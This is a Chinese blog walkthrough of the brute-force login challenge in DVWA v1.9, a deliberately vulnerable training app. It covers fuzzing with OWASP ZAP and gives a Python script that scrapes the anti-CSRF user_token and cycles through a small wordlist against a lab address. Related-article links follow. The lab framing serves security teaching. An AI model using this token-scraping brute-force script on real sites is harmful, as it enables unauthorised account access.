DVWA平台v1.9-Brute Force

最新推荐文章于 2022-09-02 12:16:09 发布
最新推荐文章于 2022-09-02 12:16:09 发布
阅读量273 收藏
点赞数
文章标签: python
原文链接:http://www.cnblogs.com/sch01ar/p/8847210.html
版权

  • Low:

随便输一下用户名,密码,test

点击Login

显示用户名或密码错误

在owasp-zap查看数据包

点击,就会转到这

右键,点击Fuzz

点击Remove删除默认的

选定参数变量值,点击Add

再点击Add

然后输入几个可能的用户名,点击添加

然后点击ok

对password参数也是一样的操作,密码的字典

设置完了之后,点击Start Fuzzer

开始暴力破解

按Size Resp.Body可以更快地找到正确的结果

是正确的账号密码

  • Medium:

Medium级别的方法跟Low级别的方法一样,只不过响应的时间有点长

看一下源代码

可以看到,登陆失败的话,会睡眠2秒

  • High:

High等级用上面的方法爆破不出来,因为多了一个user_token参数

user_token是上次请求返回的

所以,右键查看源代码能得到下次请求的user_token

这次请求的源代码

下次请求的user_token

结果是一样的

写个python脚本爆破

__author__ = "MuT6 Sch01aR#"

import requests
import re

username = ['root', 'admin', 'test']
password = ['123456', 'admin', 'admin888', 'root', 'abc123', 'password', 'qwerty']

cookie = {'security':'high','PHPSESSID':'ohjjiijt8p02u3adkoucjgqte1'}

r = requests.get(url='http://192.168.2.140/dvwa/vulnerabilities/brute/?username=&password=&Login=Login&user_token=', cookies=cookie)
r_esult = re.findall("<input type='hidden' name='user_token' value='(.*?)' />", r.text)
user_token = r_esult[0]

for u in username:
	for p in password:
		res = requests.get(url='http://192.168.2.140/dvwa/vulnerabilities/brute/?username='+u+'&password='+p+'&Login=Login&user_token='+user_token, cookies=cookie)
		re_sult = re.findall("<input type='hidden' name='user_token' value='(.*?)' />", res.text)
		user_token = re_sult[0]
		if 'Username and/or password incorrect.' in res.text:
			print("登录失败,账号:%s,密码:%s" %(u,p))
		else:
			print("登陆成功,账号:%s,密码:%s" %(u,p))

要带上cookie

运行结果

 

转载于:https://www.cnblogs.com/sch01ar/p/8847210.html

andiao1218
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA_V1.9下载安装与搭建
jammny
11-22 2317
前言 其实dvwa这个靶机在刚开始接触web安全的时候就已经玩过了,当时的版本应该是1.0.7,现在最新版本已经到1.9了。新增了PHPIDS像类似WAF的功能,刚开始打DVWA只是为了完成通关目标而打,现在回过头来拾起它,更觉得它是一个不错的渗透靶机。学习漏洞利用的同时,要明白该漏洞产生的原因是什么?如果给你一套php源码的话,你想测文件上传漏洞该从哪里切入?如果存在该漏洞怎么去修复?这些都是我接下来要思考和学习,也是我重新拿七dvwa的原因。 DVWA_V1.9下载: 链接:https://.
DVWA V1.9:Command Injection(命令注入)
qq_43233085的博客
01-23 566
DVWA V1.9:Command Injection(命令注入)Command Injection 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 Command Injection 介绍 命令注入攻击的目的是在易受攻击的应用程序中注入和执行攻击者指定的命令。 在这种情况下,执行不...
网络渗透测试平台DVWA-1.9
12-03
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版.zip
02-03
DVWA(Damn Vulnerable Web Application)程序源码v1.9稳定版 需要的赶紧下载哦 最新吧 因外国网站连接失败的原因下载速度慢或者无法打开所以为你们提供的
DVWA v1.9 新手指南
CERES123456的博客
09-01 387
DVWA简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 官网地址:http://www.dvwa.co.uk/ github地址:https://github.com...
DVWA V1.9:Brute Force(暴力破解)
qq_43233085的博客
01-22 554
DVWA V1.9:暴力破解Brute Force 介绍Low 级别核心代码官方提示漏洞利用Medium 级别High 级别Impossible 级别 Brute Force 介绍 密码破解是从计算机系统中存储或传输的数据中恢复密码的过程。 一种常见的方法是反复尝试对密码进行猜测。 用户经常选择弱密码。 不安全选择的例子包括字典中发现的单个单词、姓氏、任何太短的密码(通常被认为小于6或7个字符)或...
DVWA系列Brute Force
crystal919的博客
03-24 276
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 brute Force "暴力破解"是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一,如2014年轰动全国的12306...
DVWA-1.9系列操作之Brute Force
fly小灰灰的专栏
01-20 2328
1. Brute Force(暴力破解)模块分析  Brute Force(暴力破解),主要指黑客通过利用密码字典,采用穷举法来进行猜解用户口令,如用户名和用户密码。这也是现在最为广泛的攻击手法之一。   该模块主要功能是输入用户名和用户密码,来进行用户名以及密码的验证。主要页面如图所示:   首先我们把安全级别设置为Low级别。查看源代码:LOW<?php if( isset( $_GET[ '
DVWA教程实践之Brute Force
qq_41592596的博客
05-19 513
DVWA教程实践之Brute Force序言原教程原教程环境原教程代码运行运行环境运行问题运行调试解析器问题?编码问题?压缩问题?标签问题?运行结果运行代码总结 序言 最近一段时间在练习DVWA,参考网上的教程练习,在其中遇到了一些问题,在解决问题的过程中栽了一个又一个的坑,最后终于解决,遂写此博客。 原教程 原教程是发表在freebuf上的文章,连接如下: 新手指南:DVWA-1.9全级别教程之Brute Force 在high级别的教程中,作者采用了编程的方法去爆破密码 原教程环境 此DVWA版本为1.
Brute Force(暴力破解)
kid的博客
04-23 6755
Brute Force(暴力破解) 前言 主要针对dvwaBrute Force做一个练习,学习了解Brute Force。 主要会用到brupsuite和hydra两个工具。 练习 Low 可以看到下面是暴力破解的界面,但看到这个界面我第一反应是先尝试sql注入(最近在一个靶场练习,里面有道sql注入也是这种用户登录,而且暂时还没搞定…,后面搞定再写篇博客讲讲菜鸡的辛酸泪…),言归正传,我们还...
DVWA练习平台
04-24
是一个用来进行安全脆弱性鉴定的 PHP /MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
新手指南:DVWA 1.9 全级别教程 PDF
08-18
新手指南:DVWA 1.9 全级别教程 PDF格式
DVWA最新版
03-23
DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版DVWA最新版
DVWA平台搭建讲解以及工具集合包
06-01
DVWA平台搭建工具插件集合包 注:1、安装phpStudy是有可能会报错让安装VC(压缩包里有点击安装就好) 2、把下载好的DWVA的压缩包,放在C:\phpStudy\PHPTutorial\WWW中(我安装在了C盘) 3、配置DVWA链接数据库,打开config文件夹,打开config.inc.php,需要把db_password 修改成 和MYSQL密码一样才可以 ,不然会报错。(MYSQL查看用户名密码:右击小图标点击MYSQL工具第一个设置和修改密码就是) 4、做实验有可能IE不支持代理(建议下载谷歌浏览器) 个人搭建DVWA平台过程中遇到的问题和解决方法,整理分享给大家。
DVWA-1.9系列(简介)
fly小灰灰的专栏
01-20 2362
1. 简介  DVWA官网中的解释是:Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a
DVWA-1.9 SQL注入(SQL Injection)
kirito_pio的博客
06-29 374
目录 1、low级别 step1 判断注入点和注入类型 step2 判断字段数 step3 获取数据库信息 2、medium级别 3、high级别 4、impossible级别 之前使用的是旧的版本,这次去官网换成了1.9版本。 SQL注入的步骤大概包括以下几个步骤:1、判断网站能不能注入;2、判断注入的字段数;3、获取数据库。 1、low级别 low级别的代码如下: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // G
DVWA平台 Brute Force(暴力破解) 模块的使用
Senimo
10-24 212
DVWA平台 Brute Force 模块的使用Brute Force模块LowMediumHighImpossible Brute Force模块 通过使用穷举法,举出所有的可能的结果,然后逐一验证是否正确,以达到破解密码成功登录的目的。 Low low.php源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username...
DVWA平台搭建
qq_49408366的博客
09-02 1185
利用PHPstudy来搭建一个DVWA靶场
从头搭建DVWA平台
weixin_55802446的博客
01-22 2936
Web安全与防御 第一章 搭建DVWA平台
dvwa通关brute force
最新发布
06-08
DVWA中,Brute Force挑战是关于用户登录部分的一个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值